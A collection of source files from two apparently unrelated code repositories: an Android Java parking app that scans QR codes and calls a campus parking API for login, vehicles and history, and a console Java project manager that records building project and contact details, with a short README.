import android.os.Bundle;
import android.widget.TextView;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONObjectRequestListener;
import com.google.zxing.Result;
import com.karumi.dexter.Dexter;
import com.karumi.dexter.PermissionToken;
import com.karumi.dexter.listener.PermissionDeniedResponse;
import com.karumi.dexter.listener.PermissionGrantedResponse;
import com.karumi.dexter.listener.PermissionRequest;
import com.karumi.dexter.listener.single.PermissionListener;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.HashMap;
import me.dm7.barcodescanner.zxing.ZXingScannerView;
public class QRScanActitivy extends AppCompatActivity implements ZXingScannerView.ResultHandler {
public static final String URL_SCAN = "https://amikom.rocketjaket.com/api/Parking/processParking";
Context context;
String plat, nim;
SessionManager sessionManager;
private ZXingScannerView scannerView;
private TextView txt_Result;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_qrscan);
sessionManager = new SessionManager(this);
sessionManager.checkLogin();
HashMap<String, String> user = sessionManager.getUserDetail();
nim = user.get(SessionManager.NIM);
//init
scannerView = findViewById(R.id.zxscan);
txt_Result = findViewById(R.id.txt_Result);
context = this;
getIntentExtraData();
//req permission
Dexter.withActivity(this)
.withPermission(Manifest.permission.CAMERA)
.withListener(new PermissionListener() {
@Override
public void onPermissionGranted(PermissionGrantedResponse response) {
scannerView.setResultHandler(QRScanActitivy.this);
scannerView.startCamera();
}
@Override
public void onPermissionDenied(PermissionDeniedResponse response) {
Toast.makeText(QRScanActitivy.this, "Anda harus memberi izin penggunaan kamera!", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionRationaleShouldBeShown(PermissionRequest permission, PermissionToken token) {
}
})
.check();
}
@Override
protected void onDestroy() {
scannerView.stopCamera();
super.onDestroy();
}
private void getIntentExtraData() {
if (getIntent().hasExtra("plat")) {
plat = getIntent().getStringExtra("plat");
// Toast.makeText(context, "Plat : " + plat , Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(context, "No data", Toast.LENGTH_SHORT).show();
}
}
@Override
public void handleResult(Result rawResult) {
txt_Result.setText(rawResult.getText());
AndroidNetworking.post(URL_SCAN)
.addBodyParameter("nim", nim)
.addBodyParameter("plat", plat)
.addBodyParameter("qrcode", rawResult.getText())
.setTag(context)
.setPriority(Priority.HIGH)
.build()
.getAsJSONObject(new JSONObjectRequestListener() {
@Override
public void onResponse(JSONObject response) {
try {
Boolean status = response.getBoolean("status");
String message = response.getString("message");
if (status) {
String mhs_foto = response.getString("mhs_foto");
String mhs_nama = response.getString("mhs_nama");
String plat = response.getString("plat");
String jenis = response.getString("jenis");
String merk = response.getString("merk");
String tipe = response.getString("tipe");
Toast.makeText(context, message, Toast.LENGTH_SHORT).show();
Intent sukses = new Intent(context, ConfirmActivity.class);
sukses.putExtra("mhs_foto", mhs_foto);
sukses.putExtra("mhs_nama", mhs_nama);
sukses.putExtra("plat", plat);
sukses.putExtra("jenis", jenis);
sukses.putExtra("merk", merk);
sukses.putExtra("tipe", tipe);
context.startActivity(sukses);
finish();
} else {
Toast.makeText(context, message, Toast.LENGTH_SHORT).show();
Intent gagal = new Intent(context, HomeActivity.class);
context.startActivity(gagal);
finish();
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONArrayRequestListener;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.HashMap;
public class HomeActivity extends AppCompatActivity {
public static String URL_GETVEHICLE = "https://amikom.rocketjaket.com/api/vehicle/getListVehicleJSON";
public static String TAG = "HomeActivity";
public ArrayList<String> plat = new ArrayList<String>();
public ArrayList<String> jenis = new ArrayList<String>();
SessionManager sessionManager;
RecyclerView recycler_vehicle;
String nim, nama;
Context context;
Button logoutbtn;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_home);
sessionManager = new SessionManager(this);
sessionManager.checkLogin();
logoutbtn = findViewById(R.id.logoutbtn);
recycler_vehicle = findViewById(R.id.list_vehicle);
HashMap<String, String> user = sessionManager.getUserDetail();
nim = user.get(SessionManager.NIM);
nama = user.get(SessionManager.NAME);
// Toast.makeText(context, "nama : " + nama, Toast.LENGTH_SHORT).show();
logoutbtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Intent tete = new Intent(HomeActivity.this, SplashActivity1.class);
startActivity(tete);
sessionManager.logout();
finish();
}
});
context = this;
AndroidNetworking.initialize(getApplicationContext());
AndroidNetworking.post(URL_GETVEHICLE)
.addBodyParameter("nim", nim)
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONArray(new JSONArrayRequestListener() {
@Override
public void onResponse(JSONArray response) {
try {
for (int i = 0; i < response.length(); i++) {
JSONObject jsonObject = response.getJSONObject(i);
String plat_extract = jsonObject.getString("plat");
String jenis_extract = jsonObject.getString("jenis");
plat.add(plat_extract);
jenis.add(jenis_extract);
Integer xxx = plat.size();
Log.v(TAG, xxx.toString());
VehicleAdapter vehicleAdapter = new VehicleAdapter(context, plat, jenis);
recycler_vehicle.setAdapter(vehicleAdapter);
recycler_vehicle.setLayoutManager(new LinearLayoutManager(context));
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.os.Bundle;
import android.util.Log;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONArrayRequestListener;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.HashMap;
public class HistoryActivityBkp extends AppCompatActivity {
public static final String URL_HISTORY = "https://amikom.rocketjaket.com/api/History/getDataListHistory";
RecyclerView recyclerView;
String nim;
Context context;
ArrayList<String> plat = new ArrayList<String>();
ArrayList<String> date = new ArrayList<String>();
ArrayList<Boolean> status = new ArrayList<Boolean>();
int[] status_images = {R.drawable.ic_check, R.drawable.ic_close};
SessionManager sessionManager;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_history_bkp);
AndroidNetworking.initialize(getApplicationContext());
getHistoryData(nim);
recyclerView = findViewById(R.id.recyclerHistory);
context = this;
sessionManager = new SessionManager(context);
HashMap<String, String> user = sessionManager.getUserDetail();
nim = user.get(SessionManager.NIM);
HistoryAdapter historyAdapter = new HistoryAdapter(this, plat, date, status, status_images);
recyclerView.setAdapter(historyAdapter);
recyclerView.setLayoutManager(new LinearLayoutManager(this));
}
public void getHistoryData(String nim_ref) {
AndroidNetworking.post(URL_HISTORY)
.addBodyParameter("nim", nim_ref)
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONArray(new JSONArrayRequestListener() {
@Override
public void onResponse(JSONArray response) {
try {
for (int i = 0; i < response.length(); i++) {
JSONObject jsonObject = response.getJSONObject(i);
String plat_res = jsonObject.getString("plat");
String date_res = jsonObject.getString("date");
Boolean status_res = jsonObject.getBoolean("status");
Log.v("HistoryActivityBkp", "ASUUUUUSUUUUUUUUUUUUUUUUUU : " + plat_res);
Toast.makeText(context, "plat : " + plat_res, Toast.LENGTH_SHORT).show();
plat.add(plat_res);
date.add(date_res);
status.add(status_res);
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>include ':app'
rootProject.name='AmikomParking'
<file_sep>package com.eekrain.amikomparking;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONObjectRequestListener;
import org.json.JSONException;
import org.json.JSONObject;
public class LoginActivity extends AppCompatActivity {
public static String URL_LOGIN = "https://amikom.rocketjaket.com/api/auth";
EditText nim, password;
Button btn_login;
SessionManager sessionManager;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_login);
sessionManager = new SessionManager(this);
nim = findViewById(R.id.nim);
password = findViewById(R.id.password);
btn_login = findViewById(R.id.btn_login);
btn_login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Login();
}
});
AndroidNetworking.initialize(getApplicationContext());
}
private void Login() {
AndroidNetworking.post(URL_LOGIN)
.addBodyParameter("nim", nim.getText().toString())
.addBodyParameter("pass", password.getText().toString())
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONObject(new JSONObjectRequestListener() {
@Override
public void onResponse(JSONObject response) {
try {
Boolean status = response.getBoolean("status");
String message = response.getString("message");
if (status) {
String nama_mhs = response.getString("nama");
Toast.makeText(LoginActivity.this, message, Toast.LENGTH_SHORT).show();
sessionManager.createSession(nim.getText().toString(), nama_mhs);
Intent intent = new Intent(LoginActivity.this, HomeActivity.class);
startActivity(intent);
finish();
} else {
Toast.makeText(LoginActivity.this, "Invalid NIM/Password", Toast.LENGTH_SHORT).show();
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
|
8e40ed5d2e909b0d740d662b1ff6106342161e05
|
[
"Java",
"Gradle"
] | 6
|
Java
|
irfan1775/AmikomParking12
|
749fc724301eb4c017695eb2c1ef33d645522b26
|
17a6cc73d682a7c7555add65f275017c41f52502
|
refs/heads/main
|
<repo_name>MehboobSingh/Nabonett<file_sep>/NabonettWebAPI/Controllers/UserController.cs
using System.Collections.Generic;
using System.Threading.Tasks;
using Core;
using Core.Entities;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
[Route("Users")]
public class UserController: Controller
{
private readonly IUserService userService;
public UserController(IUserService userService)
{
this.userService = userService;
}
[HttpGet]
public async Task<IReadOnlyCollection<User>> GetAllAsync()
{
var result = await userService.GetAllAsync();
return result;
}
[HttpGet("/user/{id}")]
public async Task<User> GetAllAsync(string ID)
{
var result = await userService.GetByIDAsync(ID);
return result;
}
[HttpGet("/user/{id}/Email")]
public List<Email> GetEmailsByIDAsync(string ID)
{
return new List<Email>();
}
}
}<file_sep>/NabonettWebAPI/Startup.cs
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Hosting;
using Core;
using Core.DataInterfaces;
using Data;
using Data.Users;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.DependencyInjection;
using Data.Contacts;
namespace NabonettWebAPI
{
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
// This method gets called by the runtime. Use this method to add services to the container.
public void ConfigureServices(IServiceCollection services)
{
ConfigureDatabaseProvider(services);
services.AddControllers();
services.AddHttpContextAccessor();
services.AddSwaggerGen();
services.AddTransient<IUserService, UserService>();
services.AddTransient<IContactService, ContactService>();
services.AddTransient<IUserRepository, UsersRepository>();
services.AddTransient<IContactRepository, ContactRepository>();
}
protected virtual void ConfigureDatabaseProvider(IServiceCollection services)
{
services.AddDbContext<NabonettContext>(options =>
{
options.UseSqlServer(Configuration["ConnectionStrings:NabonettDB"]);
});
}
// This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
app.UseHttpsRedirection();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{ endpoints.MapControllers(); });
}
}
}<file_sep>/NabonettWebAPI/Controllers/HousingController.cs
using System;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
public class HousingController: Controller
{
public HousingController()
{
}
}
}
<file_sep>/NabonettWebAPI/Controllers/ContactController.cs
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using Core;
using Core.Entities;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
[Route ("Contacts")]
public class ContactController : Controller
{
private readonly IContactService contactService;
public ContactController(IContactService contactService)
{
this.contactService = contactService;
}
[HttpGet]
public async Task<IReadOnlyCollection<Contact>> GetAllAsync()
{
var contact = await contactService.GetAllAsync();
return contact;
}
[HttpGet("/id/{id}")]
public async Task<Contact> GetAsync(string id)
{
var conto = await contactService.GetContactAsync(id);
return conto;
}
[HttpGet("/email/{email}")]
public async Task<Contact> GetByEmailAsync(string email)
{
var conto = await contactService.GetByEmailAsync(email);
return conto;
}
// [HttpPost]
// public async Task<Contact> Update()
// {
// // var update = await contactService.GetAllAsync();
}
}
//
|
1810d87c613b5447c54a4cd46ab64f8af9243adf
|
[
"C#"
] | 4
|
C#
|
MehboobSingh/Nabonett
|
f5a5970fa085b8358234bb3a6e2381d9a3cebb33
|
16e9dd3a269c8f1c23d35accbc1d18f9bc4141d9
|
refs/heads/main
|
<repo_name>TaifBinEid/Builder<file_sep>/PizzaDesignPattren/PizzaDesignPattren/Program.cs
using System;
using System.Collections.Generic;
namespace PizzaDesignPattren
{
public interface IPizzaBuilder
{
// This is the basis for building any pizza
public void BuildDough();
public void BuildSauce();
public void BuildTopping();
public void Reset(); // to reset after make pizza
}
public class ThinPizzeBuilder : IPizzaBuilder
{
private ThinPizza _thin = new ThinPizza();
public ThinPizzeBuilder()
{
this.Reset();
}
public void Reset()
{
this._thin = new ThinPizza();
}
public void BuildDough()
{
this._thin.PreparePizza("Preparing the dough ..white");
}
public void BuildSauce()
{
this._thin.PreparePizza("Add souce ..white souce");
}
public void BuildTopping()
{
this._thin.PreparePizza("Add favorite topping .. cheese");
}
public ThinPizza GetPizza()
{
ThinPizza final = this._thin;
this.Reset();
return final;
}
}
public class ThickPizzaBuilder : IPizzaBuilder
{
private ThickPizza _thick = new ThickPizza();
public ThickPizzaBuilder()
{
this.Reset();
}
public void Reset()
{
this._thick = new ThickPizza();
}
public void BuildDough()
{
this._thick.PreparePizza("Preparing the dough ..wheat");
}
public void BuildSauce()
{
this._thick.PreparePizza("Add souce ..without");
}
public void BuildTopping()
{
this._thick.PreparePizza("Add favorite topping ..vegetables + cheese");
}
public ThickPizza GetPizza()
{
ThickPizza final = this._thick;
this.Reset();
return final;
}
}
public class ThinPizza
{
private List<object> _pizza = new List<object>();
public void PreparePizza(string pizza)
{ //determine type of dough ,souce,topping
this._pizza.Add(pizza);
}
public string PizzaOrder()
{
string str = "";
for (int i = 0; i < this._pizza.Count; i++)
{
str += this._pizza[i] + "\n";
}
return "Thin Pizza order : \n" + str;
}
}
public class ThickPizza
{
private List<string> _pizza = new List<string>();
public void PreparePizza(string pizza)
{ //determine type of dough ,souce,topping
this._pizza.Add(pizza);
}
public string PizzaOrder()
{
string str = "";
for (int i = 0; i < this._pizza.Count; i++)
{
str += this._pizza[i] + "\n";
}
return "Thick Pizza order : \n" + str;
}
}
public class Director
{
private IPizzaBuilder _pizzaBuilder;
public IPizzaBuilder PizzaBuilder
{
set { this._pizzaBuilder = value; }
}
public void makePizza()
{
this._pizzaBuilder.BuildDough();
this._pizzaBuilder.BuildSauce();
this._pizzaBuilder.BuildTopping();
}
public void makePizzaWithoutSauce()
{
this._pizzaBuilder.BuildDough();
this._pizzaBuilder.BuildTopping();
}
}
class Program
{
static void Main(string[] args)
{
Director director = new Director();
ThickPizzaBuilder thick = new ThickPizzaBuilder();
ThinPizzeBuilder thin = new ThinPizzeBuilder();
ThinPizzeBuilder thin2 = new ThinPizzeBuilder();
director.PizzaBuilder = thin;
// director make order of pizza with souce Ranch and topping cheese
director.makePizza();
Console.WriteLine(thin.GetPizza().PizzaOrder());
director.PizzaBuilder = thick;
// director make another order of pizza with souce Ranch and topping cheese
director.makePizza();
Console.WriteLine(thick.GetPizza().PizzaOrder());
director.PizzaBuilder = thin2;
//director make another order without souce
director.makePizzaWithoutSauce();
Console.WriteLine(thin2.GetPizza().PizzaOrder());
//Bouns 1 make pizza order without director
ThinPizzeBuilder pizza = new ThinPizzeBuilder();
pizza.BuildDough();
pizza.BuildSauce();
pizza.BuildTopping();
Console.WriteLine(pizza.GetPizza().PizzaOrder());
/* //Bouns 2 user enter his order !
* public interface IPizzaBuilder
{
// This is the basis for building any pizza
public void BuildDough(string d);
public void BuildSauce(string s);
public void BuildTopping(string t);
}
Console.WriteLine("What is the favorite type of dough (thin / thick)?");
string choice = Console.ReadLine();
string dough;
string souce;
string topping;
switch (choice)
{
case "thin":
director.PizzaBuilder = thin;
Console.WriteLine("Enter your favorite dough :(white / wheat)? ");
dough = Console.ReadLine();
Console.WriteLine("Enter your favorite souce : ");
souce = Console.ReadLine();
Console.WriteLine("Enter you favorite topping?");
topping = Console.ReadLine();
thin.makepizza(dough,souce,topping);
Console.WriteLine(thin.GetPizza().PizzaOrder());
Console.WriteLine("Enjoy .. :)");
break;
case "thick":
director.PizzaBuilder = thick;
Console.WriteLine("Enter your favorite dough :(white / wheat)? ");
dough = Console.ReadLine();
Console.WriteLine("Enter your favorite souce : ");
souce = Console.ReadLine();
Console.WriteLine("Enter you favorite topping?");
topping = Console.ReadLine();
director.makePizza(dough,souce,topping);
Console.WriteLine(thick.GetPizza().PizzaOrder());
Console.WriteLine("Enjoy .. :)");
break;
default:
Console.WriteLine("invalid choice");
break;
}*/
}
}
}
|
045284a1b2152da7517980ea0db0c70051e4615e
|
[
"C#"
] | 1
|
C#
|
TaifBinEid/Builder
|
4b839f24f1fbb76d8563d29f38b85d954d11c8a9
|
c902d143af39608c607931ef70a7696ffb0d9cc4
|
refs/heads/master
|
<file_sep>package by.ansgar.catcher2d.main;
public class Main {
public static void main(String args[]){
new GamePanel();
}
}
<file_sep>package by.ansgar.catcher2d.util;
import java.awt.RenderingHints.Key;
import org.lwjgl.input.Keyboard;
import org.lwjgl.opengl.Display;
import by.ansgar.catcher2d.entity.Enemy;
import by.ansgar.catcher2d.entity.MainHero;
import by.ansgar.catcher2d.main.GamePanel;
public class Input {
public void input() {
if (Keyboard.isKeyDown(Keyboard.KEY_ESCAPE)) {
System.out.println("Goodbye");
Display.destroy();
System.exit(0);
}
if(Keyboard.isKeyDown(Keyboard.KEY_R)){
GamePanel.enemys.add(new Enemy());
}
}
public void moveHero() {
if (Keyboard.isKeyDown(Keyboard.KEY_A)) {
((MainHero) GamePanel.hero).update(-1, 0);
}
if (Keyboard.isKeyDown(Keyboard.KEY_D)) {
((MainHero) GamePanel.hero).update(1, 0);
}
if (Keyboard.isKeyDown(Keyboard.KEY_W)) {
((MainHero) GamePanel.hero).update(0, -1);
}
if (Keyboard.isKeyDown(Keyboard.KEY_S)) {
((MainHero) GamePanel.hero).update(0, 1);
}
}
}
<file_sep>package by.ansgar.catcher2d.entity;
import static org.lwjgl.opengl.GL11.*;
import java.awt.Rectangle;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import org.newdawn.slick.opengl.Texture;
import org.newdawn.slick.opengl.TextureLoader;
import by.ansgar.catcher2d.main.GamePanel;
public class MainHero implements GameObject {
private int health;
private double x;
private double y;
private int speed;
private double r;
private Rectangle size = new Rectangle();
public MainHero() {
x = GamePanel.WIDTH / 2 - 25;
y = GamePanel.HEIGHT - 55;
speed = 3;
r = 50.0;
}
public void update(int dx, int dy) {
x += dx * speed;
y += dy * speed;
}
public void moving() {
if (x < 0) x = 0;
if (x > (GamePanel.WIDTH - 50)) x = GamePanel.WIDTH - 50;
if (y < 5) y = 5;
if (y > (GamePanel.HEIGHT - 55)) y = GamePanel.HEIGHT - 55;
}
public Texture loadTexture(String key) {
try {
return TextureLoader.getTexture("PNG", new FileInputStream(
new File("res/sprites/hero/man.png")));
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
public void draw() {
glBegin(GL_QUADS);
glTexCoord2f(0, 0);
glVertex2d(x, y);
glTexCoord2f(1, 0);
glVertex2d(x + r, y);
glTexCoord2f(1, 1);
glVertex2d(x + r, y + r);
glTexCoord2f(0, 1);
glVertex2d(x, y + r);
glEnd();
}
public boolean intersects(GameObject entity) {
size.setBounds((int)x, (int)y, 50, 50);
return size.intersects(getX(), getY(), 50, 50);
}
public int getHealth() {
return health;
}
public void setHealth(int health) {
this.health = health;
}
public int getSpeed() {
return speed;
}
public void setSpeed(int speed) {
this.speed = speed;
}
public double getX() {
return x;
}
public void setX(double x) {
this.x = x;
}
public double getY() {
return y;
}
public void setY(double y) {
this.y = y;
}
public void setR(double r) {
this.r = r;
}
public double getR() {
return r;
}
}
<file_sep>package by.ansgar.catcher2d.entity;
import static org.lwjgl.opengl.GL11.*;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import org.newdawn.slick.opengl.Texture;
import org.newdawn.slick.opengl.TextureLoader;
import by.ansgar.catcher2d.main.GamePanel;
public class Background implements GameObject {
private double x;
private double y;
public Background(){
x = 0;
y = 0;
}
public void update(int dx, int dy) {
}
public void draw() {
glBegin(GL_QUADS);
glTexCoord2f(0, 0);
glVertex2d(x, y);
glTexCoord2f(1, 0);
glVertex2d(x + GamePanel.WIDTH, y);
glTexCoord2f(1, 1);
glVertex2d(x + GamePanel.WIDTH, y + GamePanel.WIDTH);
glTexCoord2f(0, 1);
glVertex2d(x, y + GamePanel.WIDTH);
glEnd();
}
public void moving() {
}
public Texture loadTexture(String key) {
try {
return TextureLoader.getTexture("PNG", new FileInputStream(
new File("res/sprites/background/backgroundImage.png")));
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
public boolean intersects(GameObject entity) {
return false;
}
@Override
public double getX() {
// TODO Auto-generated method stub
return y;
}
@Override
public double getY() {
// TODO Auto-generated method stub
return x;
}
@Override
public void setX(double x) {
this.x = x;
}
@Override
public void setY(double y) {
this.y = y;
}
@Override
public void setR(double r) {
// TODO Auto-generated method stub
}
@Override
public double getR() {
// TODO Auto-generated method stub
return 0;
}
}
<file_sep>package by.ansgar.catcher2d.main;
import static org.lwjgl.opengl.GL11.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
import org.lwjgl.LWJGLException;
import org.lwjgl.Sys;
import org.lwjgl.input.Keyboard;
import org.lwjgl.opengl.Display;
import org.lwjgl.opengl.DisplayMode;
import org.newdawn.slick.opengl.Texture;
import by.ansgar.catcher2d.entity.Background;
import by.ansgar.catcher2d.entity.Enemy;
import by.ansgar.catcher2d.entity.GameObject;
import by.ansgar.catcher2d.entity.MainHero;
import by.ansgar.catcher2d.util.Input;
public class GamePanel {
public static final int WIDTH = 750;
public static final int HEIGHT = 550;
private long lastFrame;
public static GameObject hero, enemy;
// public static MainHero hero;
// public static Enemy enemy;
public static List<Enemy> enemys;
private Input input;
private Background background;
Texture heroSprite, enemySprite, backgroundImage;
public GamePanel() {
hero = new MainHero();
enemy = new Enemy();
enemys = new ArrayList<Enemy>();
input = new Input();
background = new Background();
enemys.add(new Enemy());
try {
Display.setDisplayMode(new DisplayMode(WIDTH, HEIGHT));
Display.setTitle("Catcher2d");
Display.create();
} catch (LWJGLException e) {
e.printStackTrace();
}
heroSprite = hero.loadTexture("heroSprite");
enemySprite = enemy.loadTexture("enemySprite");
backgroundImage = background.loadTexture("backgroundImage");
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
glOrtho(0, WIDTH, HEIGHT, 0, 1, -1);
glMatrixMode(GL_MODELVIEW);
glEnable(GL_TEXTURE_2D);
lastFrame = getTime();
while (!Display.isCloseRequested()) {
glClear(GL_COLOR_BUFFER_BIT);
input();
update();
draw();
// System.out.println(getDelta());
Display.update();
Display.sync(60);
}
Display.destroy();
}
private void input() {
// KeyBoarder
input.input();
input.moveHero();
}
private void update() {
// Enemy
for (int i = 0; i < enemys.size(); i++) {
enemys.get(i).update();
enemys.get(i).moving();
// System.out.println("Hero y =" + (int)hero.getY());
// System.out.println("Enemy y =" + (int)enemys.get(i).getY());
// if ((int)hero.getY() == (int)enemys.get(i).getY() && (int)hero.getX() == (int)enemys.get(i).getX()) {
// System.out.println("You are dead!");
// }
if(enemys.get(i).intersects(hero)){
System.out.println("You are dead!");
enemys.remove(i);
hero.setR(hero.getR() + 0.1);
System.out.println(hero.getR());
}
}
// Player
hero.moving();
}
private void draw() {
//Background
backgroundImage.bind();
background.draw();
// Enemy
enemySprite.bind();
for (int i = 0; i < enemys.size(); i++) {
enemys.get(i).draw();
}
// Player
heroSprite.bind();
hero.draw();
}
private long getTime(){
return (Sys.getTime() * 1000) / Sys.getTimerResolution();
}
private int getDelta(){
long currentTime = getTime();
int delta =(int) (currentTime - lastFrame);
lastFrame = getTime();
return delta;
}
}
|
9a2a3be33e6f76fd217e16e7595b79c3e7a249b6
|
[
"Java"
] | 5
|
Java
|
kirilamenski/Catcher2D-LWJGL-
|
831acc20a2effd650a11d552c2ac5a6b2769b095
|
02452ccc7b4557b29e76155acb1134cf8efe71b8
|
refs/heads/master
|
<file_sep>import pyttsx3
import datetime
import speech_recognition as sr
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[0].id)
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour <12:
speak("good morning sir")
elif hour >12 and hour <18 :
speak("good afternoon sir")
else:
speak("Good evening sir")
speak("i am Domdoo 1 point o")
def takeCommand():
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language = 'en-in')
print("User said : " , query )
except Exception as e:
# print(e)
print("say that again please...")
return"None"
return query
if __name__ == "__main__" :
wishMe()
takeCommand()
|
42fc2a3d24b4d5626cbf0c36b9fa92077caa4b25
|
[
"Python"
] | 1
|
Python
|
Vishal-Saroj/DomdooUsingPython
|
d2e00a6d3fb08597ffca27705e75443d67a5427a
|
3a4c4079d68f9300a79b23a709e3dacd0bec9dfe
|
refs/heads/master
|
<file_sep>#!/bin/bash
sudo yum update -y
sudo yum install -y httpd
sudo bash -c 'cat << EOF > /var/www/html/index.html
<HTML>
<HEAD>
<TITLE>
Hello World
</TITLE>
</HEAD>
<BODY>
<H1>TEST</H1>
<P>This is test "hello world" HTML document.</P>
</BODY>
</HTML>
EOF'
sudo systemctl restart httpd
sudo systemctl enable httpd
|
863c9978dbfb1b702e17fd6feb462672ee1bb478
|
[
"Shell"
] | 1
|
Shell
|
barkayw/hello-world-html
|
41561240ed84e63b55ab2b240b100d06709f41dc
|
55236f067617b39bfa57f7d5e2aa8db988d3741a
|
refs/heads/main
|
<file_sep># Capstone-Project-Manager
This project is building project manager used to save building and employee details
## How to use
User must input project details such as building type,erfnum,cost and employee details such as names,numbers and emails.
all info will be save and a receipt will be printed out
<file_sep>import java.util.Scanner;
public class projectManager {
public static void main(String[] args) {
// gets all project info
Scanner input = new Scanner(System.in);
System.out.println("Project Number: ");
int projectNum = input.nextInt();
input = new Scanner(System.in);
System.out.println("Project Name: ");
String projectName = input.nextLine();
System.out.println("Project Build Type: ");
String buildType = input.nextLine();
System.out.println("Project Address: ");
String projectAddress = input.nextLine();
System.out.println("Project Erf Number: ");
int erfNum = input.nextInt();
System.out.println("Project Total Fee: ");
double totalFee = input.nextDouble();
System.out.println("Project Amount Paid to date: ");
double paid = input.nextDouble();
input = new Scanner(System.in);
System.out.println("Project Deadline: ");
String deadline = input.nextLine();
// gets all Architect info
System.out.println("Please enter Architect surname: ");
String SurnameA = input.nextLine();
System.out.println("Please enter Architect name: ");
String NameA = input.nextLine();
System.out.println("Please enter Architect telephone number: ");
int TelephoneA = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter Architect email: ");
String EmailA = input.nextLine();
System.out.println("Please enter Architect Address: ");
String AddressA = input.nextLine();
Architect architect = new Architect(SurnameA, NameA, TelephoneA, EmailA, AddressA);// creates Architect
// gets all contractor info
System.out.println("Please enter contractor surname: ");
String surnameC = input.nextLine();
System.out.println("Please enter contractor name: ");
String nameC = input.nextLine();
System.out.println("Please enter contractor telephone number: ");
int telephoneC = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter contractor email: ");
String emailC = input.nextLine();
System.out.println("Please enter contractor Address: ");
String addressC = input.nextLine();
Contractor contractor = new Contractor(surnameC, nameC, telephoneC, emailC, addressC); // creates contractor
System.out.println("Please enter Customer surname: ");
String surname = input.nextLine();
System.out.println("Please enter Customer name: ");
String name = input.nextLine();
System.out.println("Please enter Customer telephone number: ");
int telephone = input.nextInt();
input = new Scanner(System.in);
System.out.println("Please enter Customer email: ");
String email = input.nextLine();
System.out.println("Please enter Customer Address: ");
String address = input.nextLine();
Customer customer = new Customer(surname, name, telephone, email, address); // creates Customer
// creates project
projectObject projectOne = new projectObject(projectNum, projectName, buildType, projectAddress, erfNum, totalFee, paid, deadline, architect, contractor, customer);
System.out.println(projectOne);
